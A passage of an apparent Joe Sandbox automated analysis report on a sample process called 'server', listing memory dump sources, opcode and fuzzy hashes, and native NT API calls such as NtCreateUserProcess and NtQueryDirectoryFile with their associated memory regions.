              • Instruction Fuzzy Hash: 880152305093429FCB00EB74D46955D7BE1EFC5308B44886DE455CB36AEE795C08CB72
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ec9f65b6f15c98bd0398bf7f366ea2bd3751086035a620379f92fee3401b022b
              • Instruction ID: 56cf0af5df5bfef182cb7e077c024aa29279b6e4b2b969b0a0a75ddefb9a44cb
              • Opcode Fuzzy Hash: ec9f65b6f15c98bd0398bf7f366ea2bd3751086035a620379f92fee3401b022b
              • Instruction Fuzzy Hash: 6DF02831A05304AFEB04EBB08C12B9E3B77DF42724F0484AAD200CB1C2DE359805C7A0
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fe11ef1de9df7ec6a470ad5f3757966c0ecb71f5f7f92e16454764e98813fcbd
              • Instruction ID: 359225f9070444f258011943a940b33053b71e7cb4da4deaae4d0e366871d194
              • Opcode Fuzzy Hash: fe11ef1de9df7ec6a470ad5f3757966c0ecb71f5f7f92e16454764e98813fcbd
              • Instruction Fuzzy Hash: EEF0FC72E013046FEB14DBB08C52BAE7B72DF81734F1486AED5519B2C1DE3288458790
              Memory Dump Source
              • Source File: 00000004.00000002.4627737668.0000000003970000.00000040.00000020.00020000.00000000.sdmp, Offset: 03970000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3970000_server.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8bf77a17c3e8da0c4cb46b30df8c31357310a763e4aa26229cc1396c023fce79
              • Instruction ID: 97f88f5711ec286dfb75e00f2c05b16b1bce584d53fab2da7c88f5d25fb234f5
              • Opcode Fuzzy Hash: 8bf77a17c3e8da0c4cb46b30df8c31357310a763e4aa26229cc1396c023fce79
              • Instruction Fuzzy Hash: 88F01935148644DFC306CF40D980B55FBA6EB89718F28CAADE9491BB62C737E813DB81
              Memory Dump Source
              • Source File: 00000004.00000002.4627737668.0000000003970000.00000040.00000020.00020000.00000000.sdmp, Offset: 03970000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_3970000_server.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 516e9812a9b71d10de6839d92ff4b6503073639b5b53ec056a65c49158e5e83b
              • Instruction ID: da21d03a596a9f079698721f6df4792726bf8ee24b66bb260aaca1e47d6876c8
              • Opcode Fuzzy Hash: 516e9812a9b71d10de6839d92ff4b6503073639b5b53ec056a65c49158e5e83b
              • Instruction Fuzzy Hash: BFE09276A007004F9650CF0BEC81852F794EB84630B48C07FDC0D8BB11D23AB509CAA5
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 86dd356fd6852e4d2bccdfede449142d7d65898214784236aade417a30b44bf7
              • Instruction ID: bc6ea964a9bbe9873e44c989058e15d53dd1a9980c051cf10353e997d2800699
              • Opcode Fuzzy Hash: 86dd356fd6852e4d2bccdfede449142d7d65898214784236aade417a30b44bf7
              • Instruction Fuzzy Hash: 20D0173091624CAFC740DFAADD4169D7BB9EF46214B1401FAA849C3661EA319E05DB81
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d2674e1caf1a57b3801bd7315116e0a00892a631019949527bc8acda4ac6e1d8
              • Instruction ID: 27849edd0dd9a8a011efb07faf1f0ce017f1feb55a5980e808c45d16b4e7e5ca
              • Opcode Fuzzy Hash: d2674e1caf1a57b3801bd7315116e0a00892a631019949527bc8acda4ac6e1d8
              • Instruction Fuzzy Hash: C2E0123424A3C08FCB265774942885D3F759F5710935948FEC85A9B766DA7ED442CF10
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 718598f751b34d9ab79f02b7e706b59c154be8f47cf289126002a3b3dc148e6f
              • Instruction ID: 40e67d56b32b8f68d13b1826ea5de379c86e4a66b8b838fec6c8bfefc283577d
              • Opcode Fuzzy Hash: 718598f751b34d9ab79f02b7e706b59c154be8f47cf289126002a3b3dc148e6f
              • Instruction Fuzzy Hash: 2DD0A930304200CFC320EB6EC404E81B7E8EF4A12870A00FAE588CB622CA329C0087E2
              Memory Dump Source
              • Source File: 00000004.00000002.4624137224.0000000000D92000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D92000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d92000_server.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 138f51e368083e51dc5c87b62decd6cac69310fe1c88b35e23e008287a24167f
              • Instruction ID: c13ce81c7a7853b7c3ff7678dc1c9d2fdb4fe7fcf8a4db5b9e12abdc56c2201c
              • Opcode Fuzzy Hash: 138f51e368083e51dc5c87b62decd6cac69310fe1c88b35e23e008287a24167f
              • Instruction Fuzzy Hash: B9D05E792056C15FE7169B1CC1A5FA537E4AB61708F4A44F9A8008B7B3C768E981D260
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 238525b23445c64a037d386fb2f92dded9e72f13c6c1140210675d9f59726338
              • Instruction ID: d03596e90d20cf07d8f1ab33c7e2b084cc7977fba4a22aa0afa2cb7ab65af6a7
              • Opcode Fuzzy Hash: 238525b23445c64a037d386fb2f92dded9e72f13c6c1140210675d9f59726338
              • Instruction Fuzzy Hash: 54D0A930A0220CEF8700DFA8DC0089DB7F8EB46204B0000EAA809C3320EE315E00DB80
              Memory Dump Source
              • Source File: 00000004.00000002.4624137224.0000000000D92000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D92000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_d92000_server.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d7f216d1f378e3c29f0a50602d3a1d24110291110177c1b351266548744ec2f3
              • Instruction ID: cfffc25cc534d936c67d00f00a9e151acfb6d22ff12e3abfe7a894f7c6355aa0
              • Opcode Fuzzy Hash: d7f216d1f378e3c29f0a50602d3a1d24110291110177c1b351266548744ec2f3
              • Instruction Fuzzy Hash: A3D05E342011814BDB15DB0CC6D4F6937D4AB40705F0A44ECAC108B762C3B8EC81CA10
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ff221e70cf1e0ad26309eefa33eb71a120bde8db9b9e64eb4845617323bf7cff
              • Instruction ID: e698305366987a78fa3114de69e42735083e92ccc69c23036d8b6ba77d3e3f5f
              • Opcode Fuzzy Hash: ff221e70cf1e0ad26309eefa33eb71a120bde8db9b9e64eb4845617323bf7cff
              • Instruction Fuzzy Hash: 5FD0A73584A248DFCB01CBB19C598ACBF709E4213071003DED82BC33E1EE7509048A11
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4f31a59dcc80fcf549ff7c45e7744f81dba2885fae1d06142deaffa31ea4a74b
              • Instruction ID: e694ad531afc47efd7fe7af736306e9c8001ac8ec2bd70118392d26eae461d4d
              • Opcode Fuzzy Hash: 4f31a59dcc80fcf549ff7c45e7744f81dba2885fae1d06142deaffa31ea4a74b
              • Instruction Fuzzy Hash: 76D012218053419EC701C765E8687897B959756219F88825AD0204A3A5DBA9490CCBB1
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e57140f4d052c5cf85b03a9977f2a93542b5f5a85d2b6f5786358d98744347c6
              • Instruction ID: f1d9fc7147baf6d4a94d3acad6953a2153dc21c175acb30d21328e5c2d121452
              • Opcode Fuzzy Hash: e57140f4d052c5cf85b03a9977f2a93542b5f5a85d2b6f5786358d98744347c6
              • Instruction Fuzzy Hash: 99C08C31300114CBC610EB6CD008DD6B3ECEF4D124B1144BAE148C7711CE72AC0047E1
              APIs
              • NtQueryDirectoryFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00A19688
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: DirectoryFileQuery
              • String ID:
              • API String ID: 3295332484-0
              • Opcode ID: e016d5a9b0e835b24a026b57b49fb27793e65614681a945db1eef868b8630ffc
              • Instruction ID: e2d713942009abd7d099a5205279a8b93ba5bedb50902ace5cd88322457d036b
              • Opcode Fuzzy Hash: e016d5a9b0e835b24a026b57b49fb27793e65614681a945db1eef868b8630ffc
              • Instruction Fuzzy Hash: 29019AB2205299BF9B11CF9ADCD4DEBBBACFB9E654B444144BA5897202C220AC51C7B0
              APIs
              • NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00A19014
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: CreateProcessUser
              • String ID:
              • API String ID: 2217836671-0
              • Opcode ID: ed7297171fd6e91158564f938ff88273e9fa3e69351c21b6d960c0e039572ccf
              • Instruction ID: 68bef3901b9c44ab9a704c3e8fa90350119e557454a92941fc1a4c9f798cd52e
              • Opcode Fuzzy Hash: ed7297171fd6e91158564f938ff88273e9fa3e69351c21b6d960c0e039572ccf
              • Instruction Fuzzy Hash: BB014AB6200259BF9B10CE8ADDC4DEBBBACFB8D794B444115BB1897202C234AC51CBB0
              APIs
              • NtNotifyChangeKey.NTDLL(?,?,?,?,?,?,?,?,?,?), ref: 00A19494
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: ChangeNotify
              • String ID:
              • API String ID: 3893256919-0
              • Opcode ID: f9ee59deac9feb7b0b03a0afe9906348372d3845d56d24a2341723e269832b5d
              • Instruction ID: 63f5712ff0ead36a72c2b5456fb15f60641efdf03d2906a357d6f861ed125e72
              • Opcode Fuzzy Hash: f9ee59deac9feb7b0b03a0afe9906348372d3845d56d24a2341723e269832b5d
              • Instruction Fuzzy Hash: 2601CDB6205189BF9B10CEDADCD4DFBBFACEB9E290B484005FA4993201C130AC51C7B0
              APIs
              • NtLockFile.NTDLL(?,?,?,?,?,?,?,?,?,?), ref: 00A19800
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: FileLock
              • String ID:
              • API String ID: 3169042693-0
              • Opcode ID: b93d204914edf88e7238b3682643cf6fcfbeb0a5a36da7da8f81a4a2c11c143e
              • Instruction ID: 2e057f77f62c5b7b60f65d5881b0af43b7aab1297356aeba4371389349f91d47
              • Opcode Fuzzy Hash: b93d204914edf88e7238b3682643cf6fcfbeb0a5a36da7da8f81a4a2c11c143e
              • Instruction Fuzzy Hash: 7401BBB6205289BFDB00CEDADCD4DFBBFACEB9E654B484145FA4887201C120AC51C7B0
              APIs
              • NtFsControlFile.NTDLL(?,?,?,?,?,?,?,?,?,?), ref: 00A19180
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: ControlFile
              • String ID:
              • API String ID: 1795486800-0
              • Opcode ID: 1e6c76b9375e9b5c4303283b7319c57bde4a219084547ff0a773de789090b2b0
              • Instruction ID: 35c89bd7250d1f933bc3f189166fb93bb8838f6221c1e6a46c199e0f676dc965
              • Opcode Fuzzy Hash: 1e6c76b9375e9b5c4303283b7319c57bde4a219084547ff0a773de789090b2b0
              • Instruction Fuzzy Hash: 4F017DB6600259FF9B10DE8ADCC9DEBBB6CFB9D794B444105BB1897202C270AC51CBB0
              APIs
              • NtQueryDirectoryFileEx.NTDLL(?,?,?,?,?,?,?,?,?,?), ref: 00A196E8
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
